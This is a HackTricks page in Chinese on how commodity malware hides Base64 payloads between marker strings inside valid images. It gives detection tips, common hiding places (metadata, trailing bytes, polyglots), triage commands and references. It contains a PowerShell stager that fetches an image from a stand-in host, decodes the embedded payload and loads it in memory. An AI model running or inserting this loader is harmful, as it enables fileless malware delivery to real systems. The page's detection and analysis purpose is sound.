Malware & Network Stego

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 订阅计划!

加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.

通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

并非所有 steganography 都是 pixel LSB；commodity malware 经常将 payloads 隐藏在看似有效的文件中。

实用模式

在有效图像中的 marker-delimited payloads

如果 image 被下载并被脚本立即作为 text/Base64 解析，payload 通常是由 marker 分隔的，而不是 pixel-hidden。

越来越多的 commodity loaders 将 Base64 payloads 当作纯文本隐藏在本应有效的 images（通常为 GIF/PNG）中。与 pixel-level LSB 不同，payload 通过嵌入在文件文本/metadata 中的唯一 marker strings 来分隔。然后 stager 会：

通过 HTTP(S) 下载 image
定位 start/end markers
提取两者之间的文本并进行 Base64 解码
在内存中加载/执行

最小 PowerShell carving 代码片段：

$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
$b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
$bytes = [Convert]::FromBase64String($b64)
[Reflection.Assembly]::Load($bytes) | Out-Null
}

注：

ATT&CK: T1027.003 (steganography)
检测/追踪:
扫描下载的图像以查找分隔符字符串。
标记那些获取图像并立即调用 Base64 解码例程的脚本 (PowerShell FromBase64String, JS atob, 等)。
查找 HTTP content-type 不匹配（响应为 image/* 但正文包含长的 ASCII/Base64）。

其他常见且有高信号性的隐藏 payload 的位置

这些通常比基于内容像素的 pixel stego 更快检查：

元数据: EXIF/XMP/IPTC, PNG tEXt/iTXt/zTXt, JPEG COM/APPn 段。
尾随字节: 在正式结束标记之后追加的数据（例如，在 PNG IEND 之后）。
嵌入的存档: 被 loader 嵌入或追加并解压的 ZIP/7z。
Polyglots: 被制作成对多个解析器都有效的文件（例如 image + script + archive）。

Triage commands

file sample
exiftool -a -u -g1 sample
strings -n 8 sample | head
binwalk sample
binwalk -e sample

参考资料：

Unit 42 示例: https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/
MITRE ATT&CK: https://attack.mitre.org/techniques/T1027/003/
文件格式 polyglots 与容器技巧: https://github.com/corkami/docs
Aperi’Solve (基于 web 的 stego 初筛): https://aperisolve.com/

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 订阅计划!

加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.

通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。